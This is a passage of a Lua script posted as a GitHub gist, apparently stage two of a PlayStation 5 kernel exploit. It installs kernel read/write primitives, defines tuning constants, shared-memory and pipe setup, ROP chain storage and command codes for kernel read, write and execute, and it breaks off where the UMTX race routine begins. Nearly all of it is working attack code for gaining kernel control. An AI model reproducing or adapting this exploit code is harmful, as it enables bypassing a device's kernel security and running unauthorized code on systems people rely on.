Skip to content

Instantly share code, notes, and snippets.

@flatz

flatz/graal.lua Secret

Created September 14, 2024 02:29
Show Gist options
  • Save flatz/5e12f75cdb210516d31df03069f7ed0a to your computer and use it in GitHub Desktop.
-- Route log output to a network socket sink when running on PS5 hardware
-- (use_tcp = false selects UDP); otherwise the default print sink is kept.
if is_ps5_platform() then
set_print_sink("socket", { endpoint = globals.log_server_address, use_tcp = false })
end
-- If an earlier stage attached a debugger client, verify the link is alive
-- with a ping; a failed ping is only warned about, not fatal.
if dbg_client ~= nil then
dbgf("sending ping")
if not dbg_client.ping() then
warnf("sending ping request failed")
end
end
--- Report whether stage #2 has already been loaded.
-- The presence of the global |estate| table marks a loaded stage #2.
-- @treturn boolean
function check_stage2()
  if type(estate) == "table" then
    return true
  end
  return false
end
--- Abort (via |errorf|) unless stage #1 is loaded and stage #2 has not run.
-- Returns nothing on success.
local function check_prerequisites()
  local stage1_loaded = type(check_stage1) == "function" and check_stage1()
  if not stage1_loaded then
    errorf("stage #1 not loaded")
  end
  if check_stage2() then
    errorf("stage #2 already loaded, skipping")
  end
end
-- Optionally discard this chunk's source text (after |check_prerequisites|
-- has been captured) so error backtraces stay small.
if clean_each_source then
-- Wipe out source code, otherwise it will occupy too much stack trace in case of error.
wipe_out_source(main_rop, check_prerequisites, false, "stage2")
end
-- Fail fast on wrong stage ordering, then verify the debugger link.
check_prerequisites()
ensure_dbg_client_healthy()
-------------------------------------------------------------------------------
--- Install kernel read/write primitives backed by the preloader's supercalls.
-- Defines the globals |kern_read| and |kern_write| on success.
-- @treturn boolean true when both primitives were installed, false when the
--   preloader did not expose |supercall_peek| / |supercall_poke|.
function kern_install_peek_poke_from_preloader()
  if supercall_peek == nil or supercall_poke == nil then
    return false
  end
  -- Read |size| bytes of kernel memory at |kaddr| into user buffer |uaddr|.
  -- Returns the number of bytes read, 0 for an empty request, or nil on
  -- failure / missing size.
  kern_read = function(rop, kaddr, uaddr, size)
    assert(type(rop) == "table")
    assert(is_uint64(kaddr) or type(kaddr) == "number")
    assert(is_uint64(uaddr) or type(uaddr) == "number")
    -- BUGFIX: the size assertion used to run unconditionally before the
    -- nil-check, making the nil-size fallback below unreachable; validate
    -- inside the branch, mirroring |kern_write|.
    if size ~= nil then
      assert(type(size) == "number")
      if size == 0 then
        return 0
      end
    else
      return nil
    end
    if not supercall_peek(rop, kaddr, uaddr, size) then
      warnf("supercall_peek(kaddr:%s, uaddr:%s, size:0x%x) failed", kaddr, uaddr, size)
      return nil
    end
    return size
  end
  -- Write |size| bytes from user buffer |uaddr| into kernel memory at
  -- |kaddr|. Same return convention as |kern_read|.
  kern_write = function(rop, kaddr, uaddr, size, params)
    assert(type(rop) == "table")
    assert(is_uint64(kaddr) or type(kaddr) == "number")
    assert(is_uint64(uaddr) or type(uaddr) == "number")
    if size ~= nil then
      assert(type(size) == "number")
      if size == 0 then
        return 0
      end
    else
      return nil
    end
    if not supercall_poke(rop, uaddr, kaddr, size, params) then
      warnf("supercall_poke(uaddr:%s, kaddr:%s, size:0x%x) failed", uaddr, kaddr, size)
      return nil
    end
    return size
  end
  return true
end
-------------------------------------------------------------------------------
-- Persistent exploit state shared across stage reruns; create on first load.
if estate == nil then
estate = {}
end
-- If the kernel is already pwned, only install the preloader peek/poke
-- primitives; the race-based exploit below must not run a second time.
if is_kernel_pwned(main_rop) then
if not kern_install_peek_poke_from_preloader() then
errorf("installing peek/poke from preloader failed")
end
-- Stubs: the preloader path cannot provide code execution or stack leaks.
kern_exec = function(rop, rop_cb, body_cb)
errorf("kern_exec not implemented")
end
kern_leak_stack_kptrs = function(rop, rop_cb, sleep_time, dump_ptrs)
errorf("kern_leak_stack_kptrs not implemented")
end
-- XXX: Even though it is not a failure condition, we need to stop further execution.
errorf("kernel already exploited, skipping")
end
-------------------------------------------------------------------------------
-- Debug / tuning toggles for the exploit run below.
local toggle_state_debugging = false -- log every state-buffer field offset
local toggle_set_thread_priorities = false -- apply rtprio to main/worker threads
local determine_pipe_caps = false -- measure pipe capacity instead of assuming BIG_PIPE_SIZE
local dump_kstack_partially = false
local dump_kstack = false
local dump_kstack_ptrs = false
local use_blocking_select = true -- blocking select needs fewer search attempts (see exp below)
-------------------------------------------------------------------------------
-- Preload some syscalls.
-- Resolve these ahead of time so they are available to the rop chains built
-- below (presumably caches syscall stubs -- confirm |resolve_syscalls| semantics).
resolve_syscalls(main_rop, {
"shm_open",
"shm_unlink",
"pipe",
"fstat",
"ftruncate",
"ioctl",
"select",
"mmap",
"munmap",
"mprotect",
"nanosleep",
"cpuset_getaffinity",
"cpuset_setaffinity",
"rtprio_thread",
"sched_yield",
"umtx_op",
})
-------------------------------------------------------------------------------
-- Exploit tuning constants. |exp| is a global so worker threads' rop chains
-- and helper functions all reference the same values.
exp = {
-- Common parameters.
MAX_DUMMY_SHMS = 0,
MAX_DESTROYER_THREADS = 2,
MAX_RECLAIM_OBJECTS = 10,
MAX_RECLAIM_SYSTEM_CALLS = 1, -- For |ioctl| method instead of |select|.
MAX_SEARCH_LOOP_ATTEMPTS = use_blocking_select and 8 or 32,
MAX_EXTRA_UMTX_SHMS = 1,
ROP_CAPACITY = 1024,
ROP_SCRATCH_SIZE = 0x1000,
-- Executive ROP parameters.
EXEC_ROP_CAPACITY = 1024,
EXEC_ROP_SCRATCH_SIZE = 0x1000,
-- Needed to determine victim thread ID.
RECLAIMED_THREAD_MARKER_BASE = 0x00414141,
-- To be able to know file descriptor for specific SHM we set its size as multiple of |MAGIC_NUMBER|.
MAGIC_NUMBER = 0x1000,
-- Amounts of time we need to wait before and after observing kstack and after we find it.
KSTACK_WAIT_PERIOD = use_blocking_select and sec_to_usec(0.05) or sec_to_usec(0.25),
FINAL_WAIT_PERIOD = 5000,
-- Buffer size for thread marker, it should not be larger than |SYS_IOCTL_SMALL_SIZE|,
-- otherwise |sys_ioctl| will use heap instead of stack.
THREAD_MARKER_BUFFER_SIZE = globals.SYS_IOCTL_SMALL_SIZE,
-- Pinned cores and priorities for threads.
THREAD_PRIORITY_TYPE = globals.RTP_PRIO_REALTIME, -- |RTP_PRIO_FIFO| should also work.
MAIN_THREAD_CORES = 0,
MAIN_THREAD_PRIORITY = 256,
DESTROYER_THREAD_CORES = { 1, 2 },
DESTROYER_THREAD_PRIORITY = { 256, 256 },
LOOKUP_THREAD_CORES = 3,
LOOKUP_THREAD_PRIORITY = 400,
RECLAIM_THREAD_PRIORITY = 450,
-- Victim thread name that we can use for lookup.
VICTIM_THREAD_NAME = "lulzpero",
-- We do not want to trigger direct copy, thus buffer size should be smaller than |PIPE_MINDIRECT|.
MAX_PIPE_BUFFER_SIZE = math.floor(globals.PIPE_MINDIRECT / 2),
-- Number of times kernel thread's heap pointer should occur in kernel stack to distinguish it from other kernel pointers.
TD_OCCURRENCE_THRESHOLD = 8,
-- Commands for reclaimed kernel thread.
CMD_KREAD = 1,
CMD_KWRITE = 2,
CMD_KEXEC = 3,
}
-- Sanity check: pipe writes must never trigger the direct-copy path.
assert(exp.MAX_PIPE_BUFFER_SIZE < globals.PIPE_MINDIRECT)
-- Per-run mutable bookkeeping, merged into the persistent |estate| table.
table.merge(estate, {
first_original_fd = -1,
exploited_fds = {},
saved_kstack_addrs = {},
})
-------------------------------------------------------------------------------
--- Drain all pending data from the read end of a pipe.
-- Reads until the non-blocking pipe reports EAGAIN (empty) or EOF.
-- @tparam table rop rop chain used to issue the syscalls
-- @tparam number fd read-end file descriptor
-- @treturn number|nil total bytes drained, or nil when a read fails
function flush_read_pipe_buffer(rop, fd)
  assert(type(fd) == "number")
  local chunk_size = globals.BIG_PIPE_SIZE
  -- Keep both values: |chunk_buf| anchors the allocation, |chunk_addr| is
  -- the address passed to the syscall.
  local chunk_buf, chunk_addr = temp_alloc(chunk_size)
  local total = 0
  repeat
    local result, errno = do_syscall_safe(rop, "read", fd, chunk_addr, chunk_size)
    if result:is_minus_one() then
      if errno ~= globals.EAGAIN then
        warnf("read failed (errno:%d)", errno)
        return nil
      end
      -- EAGAIN: the pipe is empty, we are done.
      break
    end
    total = total + result.lo
  until result.lo == 0
  return total
end
--- Measure the pipe buffer capacity by writing to a non-blocking pipe until
-- it reports EAGAIN, then rounding up to the nearest |SMALL_PIPE_SIZE|.
-- It always equals to |BIG_PIPE_SIZE|, thus no need to calculate it each time.
-- @tparam table rop rop chain used for syscalls
-- @treturn number|nil the measured capacity, or nil on any failure
local function calc_pipe_buffer_capacity(rop)
  local rpipe_fd, wpipe_fd = create_pipe(rop, globals.O_NONBLOCK)
  if rpipe_fd == nil or wpipe_fd == nil then
    warnf("creating pipe failed")
    return nil
  end
  local tmp_buf_size = globals.BIG_PIPE_SIZE
  local tmp_buf, tmp_buf_addr = temp_alloc(tmp_buf_size)
  local capacity = 0
  while true do
    local result, errno = do_syscall_safe(rop, "write", wpipe_fd, tmp_buf_addr, tmp_buf_size)
    if result:is_minus_one() then
      if errno == globals.EAGAIN then
        -- Pipe is full: drain the read side so it is left empty.
        local flush_size = flush_read_pipe_buffer(rop, rpipe_fd)
        if flush_size == nil then
          warnf("flushing read pipe buffer failed")
          capacity = nil
        else
          -- BUGFIX: only log on success; the old code formatted a nil
          -- |flush_size| with %x, which itself raises an error.
          dbgf("flush size: 0x%x", flush_size)
        end
      else
        warnf("write failed (errno:%d)", errno)
        capacity = nil
      end
      break
    elseif result.lo == 0 then
      break
    end
    capacity = capacity + result.lo
  end
  if capacity ~= nil then
    -- Calculated capacity can be less than actual, so round it up to nearest possible value.
    capacity = bit32.round_pow2(capacity, globals.SMALL_PIPE_SIZE)
  end
  -- Always close both ends, even on failure paths.
  if not close_file(rop, wpipe_fd) then
    warnf("closing write pipe %d failed", wpipe_fd)
  end
  if not close_file(rop, rpipe_fd) then
    warnf("closing read pipe %d failed", rpipe_fd)
  end
  return capacity
end
--- Create an anonymous SHM object sized |storage_size| (rounded up to the
-- page size) and map it twice with read/write protection: a "read" view and
-- a "write" view, each at a caller-fixed address or anywhere if nil.
-- The SHM fd is closed before returning; only the mappings remain.
-- Returns { read_addr, write_addr, storage_size } or nil on failure.
local function setup_shared_memory(rop, storage_size, read_addr, write_addr)
assert(type(storage_size) == "number")
assert(storage_size > 0)
dbgf("opening shared memory file")
local shm = shmem:new(rop)
if shm == nil then
warnf("opening shared memory file failed")
return nil
end
local status = true
local result
-- Alignment is not really needed but left it as is.
storage_size = bit32.round_pow2(storage_size, globals.PAGE_SIZE)
dbgf("truncating shared memory for rop chain to 0x%x", storage_size)
if not shm:truncate(storage_size) then
warnf("truncating shared memory for rop chain to 0x%x failed", storage_size)
status = false
else
local flags
-- A caller-provided address requires MAP_FIXED to place the view exactly.
if read_addr ~= nil then
assert(is_uint64(read_addr))
flags = bit32.bor(globals.MAP_SHARED, globals.MAP_FIXED)
else
flags = globals.MAP_SHARED
end
dbgf("mapping readable memory at %s of size 0x%x for rop chain", read_addr and read_addr or "<any>", storage_size)
result = shm:map(read_addr, storage_size, bit32.bor(globals.PROT_READ, globals.PROT_WRITE), bit32.bor(flags, globals.MAP_PREFAULT_READ), 0)
if result == nil then
warnf("mapping readable memory at %s of size 0x%x for rop chain failed", read_addr and read_addr or "<any>", storage_size)
status = false
end
-- NOTE(review): if a fixed |read_addr| was requested and the map failed,
-- this assert fires before the cleanup below can run -- confirm intended.
if read_addr ~= nil then
assert(result == read_addr)
else
read_addr = result
end
if write_addr ~= nil then
assert(is_uint64(write_addr))
flags = bit32.bor(globals.MAP_SHARED, globals.MAP_FIXED)
else
flags = globals.MAP_SHARED
end
dbgf("mapping writeable memory at %s of size 0x%x for rop chain", write_addr and write_addr or "<any>", storage_size)
result = shm:map(write_addr, storage_size, bit32.bor(globals.PROT_READ, globals.PROT_WRITE), bit32.bor(flags, globals.MAP_PREFAULT_READ), 0)
if result == nil then
warnf("mapping writeable memory at %s of size 0x%x for rop chain failed", write_addr and write_addr or "<any>", storage_size)
status = false
end
-- NOTE(review): same assert-before-cleanup hazard as above for the write view.
if write_addr ~= nil then
assert(result == write_addr)
else
write_addr = result
end
-- Trigger prefault because |MAP_PREFAULT_READ| is not available in game process.
prefault(rop, read_addr, storage_size)
prefault(rop, write_addr, storage_size)
end
-- On failure, tear down whichever views were established.
if not status then
if write_addr ~= nil then
dbgf("unmapping writeable memory at %s of size 0x%x for rop chain", write_addr, storage_size)
if not shm:unmap(write_addr, storage_size) then
warnf("unmapping writeable memory at %s of size 0x%x for rop chain failed", write_addr, storage_size)
end
write_addr = nil
end
if read_addr ~= nil then
dbgf("unmapping readable memory at %s of size 0x%x for rop chain", read_addr, storage_size)
if not shm:unmap(read_addr, storage_size) then
warnf("unmapping readable memory at %s of size 0x%x for rop chain failed", read_addr, storage_size)
end
read_addr = nil
end
end
-- The fd is no longer needed once the views exist; the mappings stay valid.
dbgf("closing shared memory file")
if not shm:close() then
warnf("closing shared memory file failed")
end
shm = nil
collectgarbage()
if not status then
return nil
end
return {
read_addr = read_addr,
write_addr = write_addr,
storage_size = storage_size,
}
end
--- Unmap the entire combined rop-chain shared memory and, when
-- |thread_index| is given, recreate just that reclaim thread's slice at the
-- same addresses and restore its contents from a backup, then refill the
-- kernel r/w pipe and wait for the reclaimed thread to drain it.
-- Returns true on success, false otherwise.
local function release_and_recreate_shared_memory_if_needed(rop, thread_index)
assert(is_uint64(estate.combined_rop_storage_read_addr) and is_uint64(estate.combined_rop_storage_write_addr))
assert(type(estate.combined_rop_storage_size) == "number")
local storage_backup_buf, storage_backup_addr
local read_addr, write_addr
if thread_index ~= nil then
-- Offset past the destroyer-thread slots into the reclaim-thread slices
-- (presumably layout: lookup, destroyers, reclaims -- confirm against the
-- num_threads computation in prepare_exploit).
local offset = (exp.MAX_DESTROYER_THREADS + thread_index) * estate.combined_rop_storage_size
storage_backup_buf, storage_backup_addr = temp_alloc(estate.combined_rop_storage_size)
read_addr = estate.combined_rop_storage_read_addr + offset
write_addr = estate.combined_rop_storage_write_addr + offset
end
local status = true
if storage_backup_addr ~= nil then
dbgf("backing up rop chain memory of reclaimed thread from %s to %s", read_addr, storage_backup_addr)
mem_copy(rop, storage_backup_addr, read_addr, estate.combined_rop_storage_size)
end
dbgf("unmapping entire writeable shared memory at %s of size 0x%x", estate.combined_rop_storage_write_addr, estate.combined_rop_storage_total_size)
if not unmap_memory(rop, estate.combined_rop_storage_write_addr, estate.combined_rop_storage_total_size) then
dbgf("unmapping entire writeable shared memory at %s of size 0x%x failed", estate.combined_rop_storage_write_addr, estate.combined_rop_storage_total_size)
status = false
end
dbgf("unmapping entire readable shared memory at %s of size 0x%x", estate.combined_rop_storage_read_addr, estate.combined_rop_storage_total_size)
if not unmap_memory(rop, estate.combined_rop_storage_read_addr, estate.combined_rop_storage_total_size) then
dbgf("unmapping entire readable shared memory at %s of size 0x%x failed", estate.combined_rop_storage_read_addr, estate.combined_rop_storage_total_size)
status = false
end
if status and storage_backup_addr ~= nil then
local result, errno
dbgf("recreating shared memory (read @ %s, write @ %s) of size 0x%x", read_addr, write_addr, estate.combined_rop_storage_size)
result = setup_shared_memory(rop, estate.combined_rop_storage_size, read_addr, write_addr)
if result ~= nil then
dbgf("recovering rop chain memory of reclaimed thread")
mem_copy(rop, write_addr, storage_backup_addr, estate.combined_rop_storage_size)
else
warnf("recreating shared memory (read @ %s, write @ %s) of size 0x%x failed", read_addr, write_addr, estate.combined_rop_storage_size)
status = false
end
dbgf("writing to pipe fd %d at %s of size 0x%x", estate.wpipe_fd, estate.pipe_buf_addr, exp.MAX_PIPE_BUFFER_SIZE)
result, errno = do_syscall_safe(rop, "write", estate.wpipe_fd, estate.pipe_buf_addr, exp.MAX_PIPE_BUFFER_SIZE)
if result:is_minus_one() then
warnf("write failed (errno:%d)", errno)
status = false
elseif result.lo ~= exp.MAX_PIPE_BUFFER_SIZE then
warnf("unexpected pipe write result 0x%x", result.lo)
status = false
end
-- Scratch slots for this reclaim thread's return value and errno.
local return_value_addr = estate.thread_return_value_addr + (exp.MAX_DESTROYER_THREADS + thread_index) * 0x8
local errno_addr = estate.thread_errno_addr + (exp.MAX_DESTROYER_THREADS + thread_index) * 0x8
dbgf("waiting until reclaim thread flush pipe")
-- Busy-wait until the reclaimed thread reports a full, successful pipe read
-- through the shared state buffer.
while memory.read32(errno_addr) ~= 0 or memory.read32(return_value_addr) ~= exp.MAX_PIPE_BUFFER_SIZE do
yield(main_rop)
end
dbgf("pipe flushed")
end
return status
end
-------------------------------------------------------------------------------
-- Log kernel structure sizes/constants relevant to the exploit.
dbgf("page size: 0x%x", globals.PAGE_SIZE)
dbgf("kstack pages: %u", globals.num_kstack_pages)
dbgf("kstack size: 0x%x", globals.kstack_size)
dbgf("pcb size: 0x%x", globals.sizeof_pcb)
dbgf("kinfo proc size: 0x%x", globals.sizeof_kinfo_proc)
dbgf("proc size: 0x%x", globals.sizeof_proc)
dbgf("thread size: 0x%x", globals.sizeof_thread)
dbgf("trapframe size: 0x%x", globals.sizeof_trapframe)
-------------------------------------------------------------------------------
-- Set name for main thread.
if not set_current_thread_name(main_rop, "main") then
errorf("setting main thread name failed")
end
-- Initial value for CPU affinity mask: 0x7f [0,1,2,3,4,5,6]
-- Initial value for thread priority: type=10 (PRI_FIFO), prio=700
-- Get initial CPU affinity mask for main thread.
local initial_cpu_affinity = get_current_thread_cpu_affinity(main_rop)
--
-- Create things needed for kernel memory manipulations.
--
runner(function()
  -- Calculate required size for state buffer.
  -- NOTE: this layout must match the address assignments below one-to-one;
  -- the size check at the end enforces that they stay in sync.
  estate.state_size =
    0x8 + -- race done flag
    0x8 + -- ready flag
    0x8 + -- destroy flag
    0x8 + -- check done flag
    0x8 + -- done flag
    0x8 + -- num ready threads
    0x8 + -- num completed threads
    0x8 + -- num destroys
    0x8 + -- num finished threads
    0x8 + -- original fd
    0x8 + -- lookup fd
    0x8 + -- winner fd
    0x8 * exp.MAX_DESTROYER_THREADS + -- fds for reclaim
    0x8 + -- victim thread id
    globals.sizeof_timespec + -- timeout
    (0x8 + 0x8) * (1 + exp.MAX_DESTROYER_THREADS + exp.MAX_RECLAIM_OBJECTS) + -- scratch area for return values/errnos for destroyer, lookup and reclaim threads
    0x8 * exp.MAX_RECLAIM_OBJECTS + -- reclaim thread stack return address
    exp.THREAD_MARKER_BUFFER_SIZE * exp.MAX_RECLAIM_OBJECTS + -- reclaim thread markers
    0x8 + -- cmd
    0x8 + -- cmd wait flag
    0x8 + -- r/w src ptr
    0x8 + -- r/w dst ptr
    0x8 -- r/w size
  -- Allocate state buffer and set up needed addresses.
  estate.state_addr_base = mem_alloc(main_rop, estate.state_size)
  dbgf("state @ %s (size: 0x%x)", estate.state_addr_base, estate.state_size)
  estate.race_done_flag_addr = estate.state_addr_base + 0x0
  estate.ready_flag_addr = estate.race_done_flag_addr + 0x8
  estate.destroy_flag_addr = estate.ready_flag_addr + 0x8
  estate.check_done_flag_addr = estate.destroy_flag_addr + 0x8
  estate.done_flag_addr = estate.check_done_flag_addr + 0x8
  estate.num_ready_threads_addr = estate.done_flag_addr + 0x8
  estate.num_completed_threads_addr = estate.num_ready_threads_addr + 0x8
  estate.num_destroys_addr = estate.num_completed_threads_addr + 0x8
  estate.num_finished_threads_addr = estate.num_destroys_addr + 0x8
  estate.original_fd_addr = estate.num_finished_threads_addr + 0x8
  estate.lookup_fd_addr = estate.original_fd_addr + 0x8
  estate.winner_fd_addr = estate.lookup_fd_addr + 0x8
  estate.fds_for_reclaim_addr = estate.winner_fd_addr + 0x8
  estate.victim_thread_id_addr = estate.fds_for_reclaim_addr + exp.MAX_DESTROYER_THREADS * 0x8
  estate.timeout_addr = estate.victim_thread_id_addr + 0x8
  estate.thread_return_value_addr = estate.timeout_addr + globals.sizeof_timespec
  estate.thread_errno_addr = estate.thread_return_value_addr + (1 + exp.MAX_DESTROYER_THREADS + exp.MAX_RECLAIM_OBJECTS) * 0x8
  estate.reclaim_thread_stack_return_addr = estate.thread_errno_addr + (1 + exp.MAX_DESTROYER_THREADS + exp.MAX_RECLAIM_OBJECTS) * 0x8
  estate.reclaim_thread_marker_addr = estate.reclaim_thread_stack_return_addr + exp.MAX_RECLAIM_OBJECTS * 0x8
  estate.cmd_addr = estate.reclaim_thread_marker_addr + exp.MAX_RECLAIM_OBJECTS * exp.THREAD_MARKER_BUFFER_SIZE
  estate.cmd_wait_flag_addr = estate.cmd_addr + 0x8
  estate.rw_src_ptr_addr = estate.cmd_wait_flag_addr + 0x8
  estate.rw_dst_ptr_addr = estate.rw_src_ptr_addr + 0x8
  estate.rw_size_addr = estate.rw_dst_ptr_addr + 0x8
  local state_end_addr = estate.rw_size_addr + 0x8
  -- Ensure that the state buffer has the correct size.
  local real_state_size = (state_end_addr - estate.state_addr_base).lo
  if real_state_size ~= estate.state_size then
    errorf("incorrect state size (allocated: 0x%x, real: 0x%x)", estate.state_size, real_state_size)
  end
  if toggle_state_debugging then
    -- BUGFIX: offsets were computed against |exp.state_addr|, which does not
    -- exist (nil) and would raise on arithmetic; the buffer base is
    -- |estate.state_addr_base|.
    logf("race_done_flag @ %s (offset: 0x%x)", estate.race_done_flag_addr, (estate.race_done_flag_addr - estate.state_addr_base).lo)
    logf("ready_flag @ %s (offset: 0x%x)", estate.ready_flag_addr, (estate.ready_flag_addr - estate.state_addr_base).lo)
    logf("destroy_flag @ %s (offset: 0x%x)", estate.destroy_flag_addr, (estate.destroy_flag_addr - estate.state_addr_base).lo)
    logf("check_done_flag @ %s (offset: 0x%x)", estate.check_done_flag_addr, (estate.check_done_flag_addr - estate.state_addr_base).lo)
    logf("done_flag @ %s (offset: 0x%x)", estate.done_flag_addr, (estate.done_flag_addr - estate.state_addr_base).lo)
    logf("num_ready_threads @ %s (offset: 0x%x)", estate.num_ready_threads_addr, (estate.num_ready_threads_addr - estate.state_addr_base).lo)
    logf("num_completed_threads @ %s (offset: 0x%x)", estate.num_completed_threads_addr, (estate.num_completed_threads_addr - estate.state_addr_base).lo)
    logf("num_destroys @ %s (offset: 0x%x)", estate.num_destroys_addr, (estate.num_destroys_addr - estate.state_addr_base).lo)
    logf("num_finished_threads @ %s (offset: 0x%x)", estate.num_finished_threads_addr, (estate.num_finished_threads_addr - estate.state_addr_base).lo)
    logf("original_fd @ %s (offset: 0x%x)", estate.original_fd_addr, (estate.original_fd_addr - estate.state_addr_base).lo)
    logf("victim_fd @ %s (offset: 0x%x)", estate.lookup_fd_addr, (estate.lookup_fd_addr - estate.state_addr_base).lo)
    logf("winner_fd @ %s (offset: 0x%x)", estate.winner_fd_addr, (estate.winner_fd_addr - estate.state_addr_base).lo)
    logf("fds_for_reclaim @ %s (offset: 0x%x)", estate.fds_for_reclaim_addr, (estate.fds_for_reclaim_addr - estate.state_addr_base).lo)
    logf("victim_thread_id @ %s (offset: 0x%x)", estate.victim_thread_id_addr, (estate.victim_thread_id_addr - estate.state_addr_base).lo)
    logf("timeout @ %s (offset: 0x%x)", estate.timeout_addr, (estate.timeout_addr - estate.state_addr_base).lo)
    logf("thread_return_value @ %s (offset: 0x%x)", estate.thread_return_value_addr, (estate.thread_return_value_addr - estate.state_addr_base).lo)
    logf("thread_errno @ %s (offset: 0x%x)", estate.thread_errno_addr, (estate.thread_errno_addr - estate.state_addr_base).lo)
    logf("reclaim_thread_stack_return @ %s (offset: 0x%x)", estate.reclaim_thread_stack_return_addr, (estate.reclaim_thread_stack_return_addr - estate.state_addr_base).lo)
    logf("reclaim_thread_marker @ %s (offset: 0x%x)", estate.reclaim_thread_marker_addr, (estate.reclaim_thread_marker_addr - estate.state_addr_base).lo)
    logf("cmd @ %s (offset: 0x%x)", estate.cmd_addr, (estate.cmd_addr - estate.state_addr_base).lo)
    logf("cmd_wait_flag @ %s (offset: 0x%x)", estate.cmd_wait_flag_addr, (estate.cmd_wait_flag_addr - estate.state_addr_base).lo)
    logf("rw_src_ptr @ %s (offset: 0x%x)", estate.rw_src_ptr_addr, (estate.rw_src_ptr_addr - estate.state_addr_base).lo)
    logf("rw_dst_ptr @ %s (offset: 0x%x)", estate.rw_dst_ptr_addr, (estate.rw_dst_ptr_addr - estate.state_addr_base).lo)
    logf("rw_size @ %s (offset: 0x%x)", estate.rw_size_addr, (estate.rw_size_addr - estate.state_addr_base).lo)
  end
end)
--- Prepare per-run exploit resources: state buffer, SHM keys, the kernel
-- r/w pipe and the combined rop-chain storage for all worker threads.
-- @treturn boolean true on success, false when a resource could not be set up
function prepare_exploit()
  -- Clear state buffer.
  mem_clear(main_rop, estate.state_addr_base, estate.state_size)
  -- Set up SHM keys.
  -- BUGFIX: the old check read the never-assigned global |shm_keys_addr|, so
  -- a previously allocated key buffer was never freed on re-entry.
  if estate.shm_keys_addr ~= nil then
    mem_free(main_rop, estate.shm_keys_addr)
    estate.shm_keys_addr = nil
  end
  estate.shm_keys_addr = mem_alloc(main_rop, 3 * 0x8)
  estate.shm_key_1 = estate.shm_keys_addr + 0x0
  estate.shm_key_2 = estate.shm_key_1 + 0x8
  estate.shm_key_3 = estate.shm_key_2 + 0x8
  -- Create, truncate and destroy dummy SHM objects.
  runner(function()
    local dummy_fds = {}
    for i = 1, exp.MAX_DUMMY_SHMS do
      dbgf("creating dummy shared memory #%u", i)
      local fd = create_anon_shm(main_rop)
      if fd == nil then
        warnf("creating dummy shared memory #%u failed", i)
        return false
      end
      dbgf("truncating dummy shared memory fd %d", fd)
      if not truncate_file(main_rop, fd, globals.kstack_size) then
        warnf("truncating dummy shared memory fd %d failed", fd)
        close_file(main_rop, fd)
        return false
      end
      dbgf("mapping dummy shared memory fd %d", fd)
      local addr = map_memory(main_rop, 0, globals.kstack_size, bit32.bor(globals.PROT_READ, globals.PROT_WRITE), bit32.bor(globals.MAP_SHARED), fd, 0)
      if addr ~= nil then
        dbgf("writing data to dummy shared memory fd %d at %s", fd, addr)
        memory.write32(addr, 0)
        dbgf("unmapping dummy shared memory fd %d at %s", fd, addr)
        if not unmap_memory(main_rop, addr, globals.kstack_size) then
          warnf("unmapping dummy shared memory fd %d at %s failed", fd, addr)
        end
      end
      table.insert(dummy_fds, fd)
    end
    -- Close the dummies in reverse creation order.
    for i = #dummy_fds, 1, -1 do
      local fd = dummy_fds[i]
      dbgf("closing dummy shared memory fd %d", fd)
      if not close_file(main_rop, fd) then
        warnf("closing dummy shared memory fd %d failed", fd)
        return false
      end
    end
  end)
  -- Create pipe to use for kernel primitives (kept across reruns).
  if estate.rpipe_fd == nil and estate.wpipe_fd == nil then
    -- Set up pipe for kernel read/write primitives.
    local rpipe_fd, wpipe_fd = create_pipe(main_rop)
    if rpipe_fd == nil or wpipe_fd == nil then
      warnf("creating pipe failed")
      return false
    end
    estate.rpipe_fd = rpipe_fd
    dbgf("read pipe fd: %d", estate.rpipe_fd)
    estate.wpipe_fd = wpipe_fd
    dbgf("write pipe fd: %d", estate.wpipe_fd)
    if determine_pipe_caps then
      estate.pipe_buf_capacity = calc_pipe_buffer_capacity(main_rop)
      if estate.pipe_buf_capacity == nil then
        warnf("calculating pipe buffer capacity failed")
        return false
      end
    else
      estate.pipe_buf_capacity = globals.BIG_PIPE_SIZE
    end
    dbgf("pipe buf capacity: 0x%x", estate.pipe_buf_capacity)
    assert(estate.pipe_buf_capacity >= globals.PAGE_SIZE)
    -- Allocate memory for pipe data.
    estate.pipe_buf_addr = mem_alloc_clear(main_rop, estate.pipe_buf_capacity)
    dbgf("pipe buf @ %s", estate.pipe_buf_addr)
  end
  -- Set moderate timeout to avoid locks.
  make_timeval_from_usec(estate.timeout_addr, sec_to_usec(1))
  -- Set up ROP storage.
  runner(function()
    dbgf("setting up rop chains storage")
    local params = determine_ropchain_storage_params(exp.ROP_CAPACITY, exp.ROP_SCRATCH_SIZE, nil, nil, nil)
    assert(params ~= nil)
    -- Alignment is not really needed but left it as is.
    local storage_size = bit32.round_pow2(params.storage_size, 0x1000)
    -- One slot for the lookup thread plus all destroyer and reclaim threads.
    local num_threads = 1 + exp.MAX_DESTROYER_THREADS + exp.MAX_RECLAIM_OBJECTS
    local total_storage_size = storage_size * num_threads
    local result
    dbgf("setting up shared memory for combined rop chains of size 0x%x", total_storage_size)
    result = setup_shared_memory(main_rop, total_storage_size, nil, nil)
    if result == nil then
      errorf("setting up shared memory for combined rop chains of size 0x%x failed", total_storage_size)
    end
    dbgf("combined rop storage read @ %s", result.read_addr)
    dbgf("combined rop storage write @ %s", result.write_addr)
    dbgf("combined rop storage total size: 0x%x", result.storage_size)
    dbgf("combined rop storage size: 0x%x", storage_size)
    estate.combined_rop_storage_read_addr = result.read_addr
    estate.combined_rop_storage_write_addr = result.write_addr
    estate.combined_rop_storage_total_size = result.storage_size
    estate.combined_rop_storage_size = storage_size
    dbgf("setting up rop chains storage done")
  end)
  assert(estate.combined_rop_storage_read_addr ~= nil and estate.combined_rop_storage_write_addr ~= nil)
  -- Per-chain cleanup is a no-op: the entire combined mapping is unmapped at
  -- once later (see release_and_recreate_shared_memory_if_needed).
  estate.rop_storage_cleanup_cb = function(storage)
    assert(storage.storage_read_addr ~= nil and storage.storage_write_addr ~= nil)
    assert(storage.real_storage_size ~= nil)
    -- No need to clean up memory now because we'll unmap entire memory at once later.
    dbgf("no need to cleaning up right now")
    return true
  end
  dbgf("creating execute rop chain")
  estate.exec_rop = ropchain:new(make_ropchain_storage_rw_default(main_rop, "kexec", exp.EXEC_ROP_CAPACITY, exp.EXEC_ROP_SCRATCH_SIZE), true)
  if estate.exec_rop == nil then
    warnf("no executive rop chain")
    return false
  end
  -- Reset per-run thread bookkeeping.
  estate.destroyer_thrs = {}
  estate.lookup_thr = nil
  estate.reclaim_thrs = {}
  estate.kstack_addr = nil
  return true
end
--- Stage and run the UMTX SHM race: pins the main thread, spawns destroyer,
